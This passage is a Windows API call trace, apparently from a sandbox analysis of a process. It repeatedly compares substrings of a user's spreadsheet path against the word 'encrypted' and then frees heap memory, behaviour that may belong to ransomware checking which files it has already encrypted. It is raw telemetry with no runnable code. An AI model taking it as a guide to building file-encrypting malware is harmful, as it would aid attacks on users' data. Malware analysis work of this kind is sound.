HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ro_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0034.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0034.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0034.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0034.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0034.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0034.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 